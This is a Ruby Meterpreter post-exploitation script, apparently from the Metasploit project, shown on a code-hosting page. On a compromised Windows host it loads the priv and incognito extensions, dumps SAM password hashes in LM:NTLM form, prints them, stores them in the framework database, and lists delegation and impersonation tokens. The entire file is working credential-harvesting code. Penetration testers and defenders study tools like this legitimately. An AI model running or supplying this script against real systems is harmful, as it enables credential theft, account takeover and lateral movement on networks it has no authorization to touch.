79 lines
2.2 KiB
Ruby
79 lines
2.2 KiB
Ruby
# credcollect - tebo[at]attackresearch.com
|
|
|
|
opts = Rex::Parser::Arguments.new(
|
|
"-h" => [ false,"Help menu." ],
|
|
"-p" => [ true,"The SMB port used to associate credentials."]
|
|
)
|
|
|
|
smb_port = 445
|
|
|
|
opts.parse(args) { |opt, idx, val|
|
|
case opt
|
|
when "-h"
|
|
print_line("CredCollect -- harvest credentials found on the host and store them in the database")
|
|
print_line("USAGE: run credcollect")
|
|
print_line(opts.usage)
|
|
raise Rex::Script::Completed
|
|
when "-p" # This ought to read from the exploit's datastore.
|
|
smb_port = val.to_i
|
|
end
|
|
}
|
|
|
|
if client.platform =~ /win32|win64/
|
|
# Collect even without a database to store them.
|
|
if client.framework.db.active
|
|
db_ok = true
|
|
else
|
|
db_ok = false
|
|
end
|
|
|
|
|
|
# Make sure we're rockin Priv and Incognito
|
|
client.core.use("priv") if not client.respond_to?("priv")
|
|
client.core.use("incognito") if not client.respond_to?("incognito")
|
|
|
|
# It wasn't me mom! Stinko did it!
|
|
hashes = client.priv.sam_hashes
|
|
|
|
# Target infos for the db record
|
|
addr = client.sock.peerhost
|
|
# client.framework.db.report_host(:host => addr, :state => Msf::HostState::Alive)
|
|
|
|
# Record hashes to the running db instance
|
|
print_good "Collecting hashes..."
|
|
hashes.each do |hash|
|
|
data = {}
|
|
data[:host] = addr
|
|
data[:port] = smb_port
|
|
data[:sname] = 'smb'
|
|
data[:user] = hash.user_name
|
|
data[:pass] = hash.lanman + ":" + hash.ntlm
|
|
data[:type] = "smb_hash"
|
|
data[:active] = true
|
|
|
|
print_line " Extracted: #{data[:user]}:#{data[:pass]}"
|
|
client.framework.db.report_auth_info(data) if db_ok
|
|
end
|
|
|
|
# Record user tokens
|
|
tokens = client.incognito.incognito_list_tokens(0)
|
|
raise Rex::Script::Completed if not tokens
|
|
|
|
# Meh, tokens come to us as a formatted string
|
|
print_good "Collecting tokens..."
|
|
(tokens["delegation"] + tokens["impersonation"]).split("\n").each do |token|
|
|
data = {}
|
|
data[:host] = addr
|
|
data[:type] = 'smb_token'
|
|
data[:data] = token
|
|
data[:update] = :unique_data
|
|
|
|
print_line " #{data[:data]}"
|
|
client.framework.db.report_note(data) if db_ok
|
|
end
|
|
raise Rex::Script::Completed
|
|
else
|
|
print_error("This version of Meterpreter is not supported with this Script!")
|
|
raise Rex::Script::Completed
|
|
end
|